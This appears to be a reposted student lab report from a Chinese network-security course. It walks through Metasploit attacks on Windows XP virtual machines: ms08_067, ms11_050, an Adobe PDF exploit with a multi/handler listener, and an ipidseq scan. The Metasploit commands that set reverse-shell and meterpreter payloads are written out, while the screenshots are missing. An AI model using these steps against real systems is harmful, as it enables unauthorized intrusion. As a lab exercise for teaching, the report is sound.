20155311《网络对抗》MSF基础应用

最新推荐文章于 2018-05-03 23:08:00 发布
最新推荐文章于 2018-05-03 23:08:00 发布
阅读量83 收藏
点赞数
原文链接:http://www.cnblogs.com/gaoziyun11/p/8954387.html
版权

20155311《网络对抗》MSF基础应用

实验过程

实验系统

  • 靶机1:Windows XP Professional SP2 ,IP地址:192.168.136.129
  • 靶机2:Windows XP vivian SP3 简体中文,IP地址:192.168.136.130
  • Kali IP地址:192.168.136.128

1、主动攻击:ms08_067
•使用靶机1和Kali
先msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:

1071541-20180426182635146-88290091.png

  • 用show targets查看可以被攻击的靶机的操作系统型号:
    1071541-20180426182650066-904169889.png

  • 用show payloads查看可以供我们使用的攻击载荷:
    1071541-20180426182758350-1146306575.png

  • 从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

1071541-20180426182814948-855233812.png

  • 用show options查看需要设置的参数

  • 这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置:
    1071541-20180426182924307-668055609.png

  • 设置target选项目标(例如我攻击系统为WIN xp 中文简体 SP2,所以选择10)

  • 确认参数设置无误后,用exploit指令开始攻击:
    1071541-20180426183020691-725243616.png

  • 攻击成功后会获取靶机的shell,可以对其进行操作:
    1071541-20180426183050046-565897266.png

2、针对浏览器的攻击:ms11_050

  • 使用靶机2和Kali(一开始用自己的最后会有问题,所以换了老师之前的kali)

用search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:

  • 用info查看该模块的信息(这个指令相当于show targets、show options等的集合版):
    1071541-20180426183137273-1292190142.png

1071541-20180426183159776-639189227.png

  • 用set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。

用show options确认需要设置的参数是否已经设置好。

  • 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

  • 在靶机IE上输入该网址

1071541-20180426183253113-424226351.png

  • kali中显示session 1已经创建,并显示其会话ID

1071541-20180426183313998-1504040775.png

然而实验2还是失败了 XP系统的IE浏览器已经崩掉了 好多同学跟我有同样的毛病。。。。。。。。。。。。

3、针对客户端的攻击:adobe_toolbutton

  • 使用靶机2和Kali

用search adobe查询一下针对该漏洞的攻击模块:
1071541-20180426183434077-1060186587.png

  • 选择一个模块并使用该模块:

1071541-20180426183501801-735650854.png

  • 用show targets查看可以被攻击的靶机的操作系统型号

  • 设置payload攻击载荷,命令set payload windows/meterpreter/reverse_tcp

  • 用show options查看需要设置的参数:

1071541-20180426184017956-1584666226.png

  • 设置相应参数,实施exploit攻击,发现在/root/.msf4/local/目录下成功生成了一个qiaolei05.pdf文件:
    1071541-20180426183600376-1106375549.png

  • 这个时候你可能在你的kali中找不到这个pdf文件,那么打开文件夹的隐藏文件显示就可以找到啦

1071541-20180426183726532-1555607893.png

  • 将pdf文件粘贴到靶机win xp
    1071541-20180426183841621-1140204322.png

  • 在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再设置IP以及端口

  • 在靶机上打开刚刚那个pdf文件(这个时候可能xp没有adobe就需要下载一波,地址呢可以到这里下载),可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

4、成功应用任何一个辅助模块:ipidseq

  • ipidseq
    功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。

拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为Incremental!的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。

TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。

  • 用show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq:

1071541-20180426184050753-1977001858.png

  • 查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。

1071541-20180426184059518-1533626504.png

  • 也可以对指定网段的主机进行扫描:

1071541-20180426184111633-46494399.png

实验总结和收获

  • 本次实验是对我们之前已经初步用过的msf有了全面的认识和使用。通过查阅各种漏洞,发现真的是触目惊心,各式各样,五花八门,只有想不到,没有实现不了的。如果想对微软的各种漏洞有个全面的了解,可以通过查看microsoft的安全技术中心中的安全公告。 而微软对其门下的各种系统的技术支持是有生命周期的,而其中我们最为熟知的xp已经不在技术支持范围内。在中国,仍然使用着xp系统的计算机还有很多(尤其是父母这辈人,他们本就缺乏这方面的安全知识),而xp还存在着许多已知、未知的漏洞会被攻击者加以利用。足见更新软件、系统的重要性。
  • 通过这次实验基本掌握了msf渗透攻击的“套路”,无非是search 查看漏洞信息,show targets 查看可以攻击的系统,show payloads 选择合适的载荷 ,show options 查看需要修改那些属性,info查看各种详细信息,最后反弹链接shell,只要找到合适的靶机,合适的版本,“三板斧”下来基本都可以解决。

转载于:https://www.cnblogs.com/gaoziyun11/p/8954387.html

weixin_30617695
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 361
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
通信与网络中的MSF基于组件的业务框架
11-14
**MSF基于组件的业务框架概述** ...总结来说,MSF基于组件的业务框架提供了一种结构化的方法来设计和实施通信与网络服务,通过模块化和标准化,使得业务开发更加高效,同时也为未来的业务创新和升级提供了强大的基础
20155305《网络对抗MSF基础应用
weixin_30827565的博客
04-14 169
20155305《网络对抗MSF基础应用 实验过程 实验系统 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.108 靶机2:Windows XP Professional SP3 简体中文,IP地址:192.168.1.113 windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多。 Kali IP地址:19...
20155218《网络对抗MSF基础应用
04-17 126
20155218《网络对抗MSF基础应用 实验过程 1、一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞; show target 查看可以攻击的目标主机类型; show payloads查看可以选择的攻击载荷,看了一下其等级全为normal,从中找到一个可用的攻击载荷 generic/shell_reverse_tcp 用op...
20155304《网络对抗MSF基础应用
05-03 195
20155304《网络对抗MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1一个主动攻击实践,如ms08_067; 1.2 一个针对浏览器的攻击,如ms11_050; 1.3 一个针对客户端的攻击,如Adobe; 1.4 成功应用任何一个辅助模块。 1.1主动攻击:ms08_067 使用靶机1和Kali 先...
20145327 《网络对抗MSF基础应用
dengnaxun1606的博客
04-15 127
20145327 《网络对抗MSF基础应用 主动攻击ms08_067 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版) kali ip地址:192.168.43.54 windows xp sp3 ip地址:192.168.43.56 ping通: MS08_067远程漏洞攻击实践:Shell 1.开启msfconsole. 2.输入命令search ...
20155320《网络对抗MSF基础应用
weixin_30799995的博客
04-28 105
20155320《网络对抗MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode 于exploit,我觉得exploit是利用一些工具和方法,通过一些渠道知道某些操作系统存在的漏洞并对漏洞资料进行分析研究,从而获取到了被攻击者计算机的相关信息,或者是可以进行提权等超级用户的操作 payload 感觉就是一段代码,通过运行这个代码可以实现漏洞攻击 enc...
20155307《网络对抗MSF基础应用
weixin_30505225的博客
05-02 122
实验过程 实验系统 所需设备: 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.128 靶机2:Windows XP Professional SP3 ,IP地址:192.168.1.133 ~ windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多。 Kali IP地址:192.168.1.115 1、主动攻击...
20145219《网络对抗MSF基础应用
weixin_30433075的博客
04-14 90
20145219《网络对抗MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里。 payload:用来攻击的代码、程序等。 encode:编码方式,让被传输的东西变得更不易被发现。 实践过程记录 靶机1:WinXPenSP3,IP地址:192.168.87.127 靶机2:Windows XP ...
20145322 《网络对抗MSF基础应用1
04-17 126
20145322何志威 Exp5 MS08_067漏洞测试 实验问答 什么是exploit、payload、encode exploit:通过一个漏洞对程序进行攻击的过程 payload:有具体功能作用的代码 encode:对payload进行伪装 实验链接 实验一MS08_067漏洞测试 实验二MS11_050 实验三Adobe阅读...
msf简单运用基础
12-16
文中通过ping命令验证了网络连通性,这是进行后续渗透测试的基础。 ### 二、MSF框架的初步使用 #### 1. 扫描目标系统 - **db_nmap**: 这是MSF中调用Nmap工具的一种方式,用于获取目标主机的操作系统类型、开放端口...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
74-74.渗透测试-MSF核心模块.mp4
05-10
74-74.渗透测试-MSF核心模块.mp4
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
005 - 马科维茨投资组合理论实现
08-10
python基于tushare实现马科维茨投资组合理论实现
基于ASP的学生信息档案管理系统毕业论文及源码.rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
[毕业设计]VB与Access共筑文档安全管理与分享平台(源代码+论文+答辩PPT).zip
最新发布
08-10
[毕业设计]VB与Access共筑文档安全管理与分享平台(源代码+论文+答辩PPT)
毕业设计,基于ASP+SqlServer开发的高校工资管理系统,内含完整源代码,数据库,毕业论文
08-10
毕业设计,基于ASP+SqlServer开发的高校工资管理系统,内含完整源代码,数据库,毕业论文 随着网络应用技术的飞速发展,基于网络应用系统给人们带来了诸多便利。建立高校工资管理系统是为了适应现代化校园管理的需要,方便管理职工工资情况和职工个人信息;同时也方便职工可以上网查询自己的工资信息,还有利于提高办公效率,改善办公质量,规范高校职工工资的常规管理工作。 高校工资管理系统的开发是基于B/S结构,采用ASP编程技术及SQL Server数据库进行开发。本文首先对网站开发环境和运行平台、数据库、ASP编程技术做了简要的介绍,并对工资管理系统的设计进行了详细的需求分析;然后给出了高校工资管理系统的设计方案及系统的具体实现,实现了高校工资管理系统的构建,主要包括系统工资管理模块、职工信息查询模块和系统信息管理及维护模块;最后,通过测试与分析,说明该系统运行稳定、可靠,具有一定的实用价值。 关键词:工资管理系统;信息查询;信息管理;信息维护;网络数据库
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值